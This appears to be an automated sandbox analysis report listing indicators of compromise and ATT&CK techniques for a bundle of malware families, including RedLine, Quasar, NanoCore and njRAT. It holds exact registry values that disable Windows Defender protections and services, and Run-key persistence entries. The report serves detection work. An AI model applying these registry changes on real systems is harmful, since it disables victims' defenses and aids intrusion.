lumma | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies Windows Defender notification settings 3 TTPs 3 IoCs

evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
Njrat family
njrat
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral1/files/0x002a00000004518c-491.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 4 IoCs

resource	yara_rule
behavioral1/files/0x002700000004517b-403.dat	family_quasar
behavioral1/memory/5100-411-0x0000000000750000-0x0000000000A9E000-memory.dmp	family_quasar
behavioral1/files/0x00280000000451d9-510.dat	family_quasar
behavioral1/memory/1976-518-0x0000000000580000-0x00000000008A4000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00280000000451ad-259.dat	family_redline
behavioral1/memory/3728-314-0x0000000000C80000-0x0000000000CD2000-memory.dmp	family_redline

Redline family
redline

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 2728 created 3564	2728	2668931653.exe	57
PID 2728 created 3564	2728	2668931653.exe	57
PID 5008 created 3564	5008	winupsecvmgr.exe	57
PID 5008 created 3564	5008	winupsecvmgr.exe	57
PID 5008 created 3564	5008	winupsecvmgr.exe	57

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

Query Registry

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TigerHulk3.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3320	powershell.exe
2392	powershell.exe
5268	powershell.exe
1752	powershell.exe
2152	powershell.exe
3980	powershell.exe
5020	powershell.exe
3460	powershell.exe
5008	powershell.exe
2096	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	svchost.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
772	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3356	takeown.exe
2056	icacls.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TigerHulk3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TigerHulk3.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	Server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	2855720420.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	run2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	ev.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	XClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeUpdate.lnk	Setup.exe

Executes dropped EXE 35 IoCs

pid	Process
3972	4363463463464363463463463.exe
2624	Armanivenntii_crypted_EASY.exe
2760	loader.exe
4544	Server.exe
2872	Setup.exe
3980	AmLzNi.exe
1148	server.exe
1168	DAB0.tmp.zx.exe
2056	DAB0.tmp.zx.exe
3728	DE2C.tmp.x.exe
3848	TigerHulk3.exe
3580	Authenticator.exe
2272	nano.exe
5100	Java32.exe
1168	java.exe
1452	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
4756	r.exe
4068	sysnldcvmr.exe
1976	ardara.exe
988	Client.exe
4320	2855720420.exe
4908	100338673.exe
3732	198243764.exe
4372	run2.exe
556	test23.exe
3140	ev.exe
5008	winupsecvmgr.exe
4716	LoadNew.exe
2208	taskhost.exe
4400	665325503.exe
2340	3200919441.exe
4304	mobiletrans.exe
612	XClient.exe
228	newfile.exe

Loads dropped DLL 27 IoCs

pid	Process
2624	Armanivenntii_crypted_EASY.exe
2056	DAB0.tmp.zx.exe
2056	DAB0.tmp.zx.exe
2056	DAB0.tmp.zx.exe
2056	DAB0.tmp.zx.exe
2056	DAB0.tmp.zx.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3356	takeown.exe
2056	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x002a0000000450c0-328.dat	themida
behavioral1/memory/3848-333-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp	themida
behavioral1/memory/3848-334-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp	themida
behavioral1/memory/3848-335-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp	themida
behavioral1/memory/3848-336-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp	themida
behavioral1/memory/3848-338-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	loader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\{9829769D37692371543510}\\{9829769D37692371543510}.exe"	Setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\42db17215651017a223d2108cb096394 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\42db17215651017a223d2108cb096394 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Service = "C:\\Program Files (x86)\\DHCP Service\\dhcpsv.exe"	nano.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	r.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TigerHulk3.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	nano.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
103	raw.githubusercontent.com
104	raw.githubusercontent.com
22	raw.githubusercontent.com
23	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
150	ip-api.com

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

persistence privilege_escalation

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00280000000450c3-156.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3848	TigerHulk3.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2624 set thread context of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 2872 set thread context of 3372	2872	Setup.exe	103
PID 5008 set thread context of 3144	5008	winupsecvmgr.exe	282
PID 5008 set thread context of 2312	5008	winupsecvmgr.exe	285

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\DHCP Service\dhcpsv.exe	nano.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\sysnldcvmr.exe	r.exe
File created	C:\Windows\sysnldcvmr.exe	r.exe

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0029000000045101-192.dat	pyinstaller
behavioral1/files/0x0027000000045187-425.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4304	3140	WerFault.exe	150

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DE2C.tmp.x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ev.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3200919441.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	198243764.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nano.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
4784	timeout.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3280	schtasks.exe
4812	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1100	WMIC.exe
1100	WMIC.exe
1100	WMIC.exe
1100	WMIC.exe
2872	Setup.exe
2872	Setup.exe
2872	Setup.exe
2872	Setup.exe
2872	Setup.exe
2872	Setup.exe
2872	Setup.exe
2872	Setup.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe
3372	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
3616	7zFM.exe
4036	cmd.exe
3564	Explorer.EXE
2272	nano.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4068	sysnldcvmr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3616	7zFM.exe
Token: 35	3616	7zFM.exe
Token: SeSecurityPrivilege	3616	7zFM.exe
Token: SeSecurityPrivilege	3616	7zFM.exe
Token: SeDebugPrivilege	3972	4363463463464363463463463.exe
Token: SeIncreaseQuotaPrivilege	1100	WMIC.exe
Token: SeSecurityPrivilege	1100	WMIC.exe
Token: SeTakeOwnershipPrivilege	1100	WMIC.exe
Token: SeLoadDriverPrivilege	1100	WMIC.exe
Token: SeSystemProfilePrivilege	1100	WMIC.exe
Token: SeSystemtimePrivilege	1100	WMIC.exe
Token: SeProfSingleProcessPrivilege	1100	WMIC.exe
Token: SeIncBasePriorityPrivilege	1100	WMIC.exe
Token: SeCreatePagefilePrivilege	1100	WMIC.exe
Token: SeBackupPrivilege	1100	WMIC.exe
Token: SeRestorePrivilege	1100	WMIC.exe
Token: SeShutdownPrivilege	1100	WMIC.exe
Token: SeDebugPrivilege	1100	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1100	WMIC.exe
Token: SeRemoteShutdownPrivilege	1100	WMIC.exe
Token: SeUndockPrivilege	1100	WMIC.exe
Token: SeManageVolumePrivilege	1100	WMIC.exe
Token: 33	1100	WMIC.exe
Token: 34	1100	WMIC.exe
Token: 35	1100	WMIC.exe
Token: 36	1100	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1100	WMIC.exe
Token: SeSecurityPrivilege	1100	WMIC.exe
Token: SeTakeOwnershipPrivilege	1100	WMIC.exe
Token: SeLoadDriverPrivilege	1100	WMIC.exe
Token: SeSystemProfilePrivilege	1100	WMIC.exe
Token: SeSystemtimePrivilege	1100	WMIC.exe
Token: SeProfSingleProcessPrivilege	1100	WMIC.exe
Token: SeIncBasePriorityPrivilege	1100	WMIC.exe
Token: SeCreatePagefilePrivilege	1100	WMIC.exe
Token: SeBackupPrivilege	1100	WMIC.exe
Token: SeRestorePrivilege	1100	WMIC.exe
Token: SeShutdownPrivilege	1100	WMIC.exe
Token: SeDebugPrivilege	1100	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1100	WMIC.exe
Token: SeRemoteShutdownPrivilege	1100	WMIC.exe
Token: SeUndockPrivilege	1100	WMIC.exe
Token: SeManageVolumePrivilege	1100	WMIC.exe
Token: 33	1100	WMIC.exe
Token: 34	1100	WMIC.exe
Token: 35	1100	WMIC.exe
Token: 36	1100	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2872	Setup.exe
Token: SeSecurityPrivilege	2872	Setup.exe
Token: SeTakeOwnershipPrivilege	2872	Setup.exe
Token: SeLoadDriverPrivilege	2872	Setup.exe
Token: SeSystemProfilePrivilege	2872	Setup.exe
Token: SeSystemtimePrivilege	2872	Setup.exe
Token: SeProfSingleProcessPrivilege	2872	Setup.exe
Token: SeIncBasePriorityPrivilege	2872	Setup.exe
Token: SeCreatePagefilePrivilege	2872	Setup.exe
Token: SeBackupPrivilege	2872	Setup.exe
Token: SeRestorePrivilege	2872	Setup.exe
Token: SeShutdownPrivilege	2872	Setup.exe
Token: SeDebugPrivilege	2872	Setup.exe
Token: SeSystemEnvironmentPrivilege	2872	Setup.exe
Token: SeRemoteShutdownPrivilege	2872	Setup.exe
Token: SeUndockPrivilege	2872	Setup.exe
Token: SeManageVolumePrivilege	2872	Setup.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
3616	7zFM.exe
3616	7zFM.exe
3616	7zFM.exe
3616	7zFM.exe
3980	AmLzNi.exe
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3980	AmLzNi.exe
3980	AmLzNi.exe
3980	AmLzNi.exe
3980	AmLzNi.exe
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3616	7zFM.exe
3616	7zFM.exe
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
1168	java.exe
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
988	Client.exe
2312	dwm.exe
2312	dwm.exe
2312	dwm.exe
2312	dwm.exe
2312	dwm.exe
2312	dwm.exe
2312	dwm.exe
2312	dwm.exe
2312	dwm.exe
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
2312	dwm.exe
2312	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3980	AmLzNi.exe
3980	AmLzNi.exe
3980	AmLzNi.exe
3980	AmLzNi.exe
3980	AmLzNi.exe
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE
3564	Explorer.EXE

